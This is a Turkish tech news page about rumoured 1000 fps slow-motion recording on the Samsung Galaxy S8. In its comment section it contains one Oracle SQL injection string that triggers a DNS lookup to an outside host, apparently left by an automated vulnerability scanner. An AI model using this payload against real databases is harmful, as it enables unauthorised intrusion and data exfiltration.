Galaxy S8'e Ultra Yavaş Özelliği!

Samsung Galaxy S8 ve Galaxy S8 Plus ile ilgili çıkan yeni bir haber heyecanlandırdı. Galaxy S8 video çekimlerde farklı bir kayıt yeteneği ile gelecek!
17 Mart 2017 09:39
Galaxy S8e Ultra Yavaş Özelliği!
Merakla beklenilen Samsung Galaxy S8 ve Galaxy S8 Plus akıllı telefonlar için iddiaların ve sızıntıların resmen ardı arkası kesilmiyor. Son iddialar ise, amiral gemisinin ultra ağır çekim video kayıt yetenekleriyle ilgili olarak geldi.
 
Samsung Galaxy S8 1000 fps video çekebilir!
 
Galaxy S8 modellerinin her ikisinin de saniyede 1000 kare yakalayabilecek ultra ağır çekim video kaydetme özelliğiyle birlikte sunulacağı öne sürülmüş durumda. Sony, Xperia XZ ve Xperia XZ Premium modellerinde gücünü IMX400’den alan benzer yeteneği Motion Eye Camera’yı tanıtmıştı. Samsung ise bunu bir Sony gibi bir sensörle değil kendi özel çözümüyle başaracak.
 
 
Samsung’un ise kamera sensörü ile görüntü sinyal işlemcisi devreleri arasına ekstra DRAM bellek bileşeni eklemeyi düşündüğü söyleniyor. Böylece sensörün ağır çekim videolar üzerinden yakaladığı büyük miktarlardaki veri, görüntü sinyal işlemcisi üzerine düşmeden önce başka bir yerde depolanmış olacak.
 
Ek olarak Galaxy S8 ön kamerasının da otomatik odaklanma yeteneğiyle güncelleneceği ancak 8 megapiksel (MP) çözünürlük sunacağı söyleniyor. Ön tarafta ayrıca bir de akıllı telefonun kilidini açmak için işe yarayacak olan iris tarayıcısının 3.7 MP çözünürlükteki kamerası yer alacak.
 
Samsung Galaxy S8 modelleriyle ilgili olarak gelen her bir detay, heyecanı bir basamak yukarı taşımayı başarıyor.
 
shiftdelete
544624
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('bikuxjpichcasr0qqkwozdw9-wo7j3qkvojqvl8m'||'roq.r87.me') from DUAL))||'
05 Ağustos 2017, Cumartesi 20:43
1,000 FPS modu nasıl aktif ediliyor ?
Bu haberler ilginizi çekebilir